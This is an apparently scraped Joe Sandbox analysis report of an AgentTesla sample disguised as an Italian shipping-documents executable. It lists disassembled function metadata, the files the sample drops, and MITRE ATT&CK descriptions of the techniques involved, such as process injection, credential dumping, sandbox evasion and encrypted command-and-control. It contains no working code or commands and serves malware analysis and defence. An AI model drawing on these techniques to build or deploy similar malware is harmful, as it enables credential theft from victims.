Function 2695AD95 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

$fq, xrefs: 2695AEB9
$fq, xrefs: 2695AF3B
$fq, xrefs: 2695AF64
$fq, xrefs: 2695AF0C

Memory Dump Source

Source File: 00000006.00000002.2947113816.0000000026950000.00000040.00000800.00020000.00000000.sdmp, Offset: 26950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26950000_wabmig.jbxd

Similarity

API ID:
String ID: $fq$$fq$$fq$$fq
API String ID: 0-2113499236
Opcode ID: dcd13f990f0b0a1b5bb824789c7583daecc03a2ba58d5c1f2130738c50aa03db
Instruction ID: f4151bf984a6cfe681d23fb122cd492710059da5aaa8f0c8ca7c7fc016342912
Opcode Fuzzy Hash: dcd13f990f0b0a1b5bb824789c7583daecc03a2ba58d5c1f2130738c50aa03db
Instruction Fuzzy Hash: 44519E34E102058BCB15DB68D490AADB7B7EB88300F21856AE806A7355DF34DD49CB99

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Documenti di spedizione 0009333000459595995.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mhdfyts.f32.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgleuzwt.khu.ps1

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll

C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe

C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe:Zone.Identifier

C:\Users\user\AppData\Local\acneform\Dyssen.Mod

C:\Users\user\AppData\Local\acneform\afplingen.che

C:\Users\user\AppData\Local\acneform\forlggere.bov

C:\Users\user\AppData\Local\acneform\okapier.Com

C:\Users\user\AppData\Local\acneform\rettersted.bef

C:\Users\user\AppData\Local\acneform\xenosaurid.txt

Static File Info

General

File Icon

Windows Analysis Report
Documenti di spedizione 0009333000459595995.exe

Function 73A91096 Relevance: 114.4, APIs: 56, Strings: 9, Instructions: 627
filestringmemoryCOMMON

Function 00403532 Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204
stringCOMMON

Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre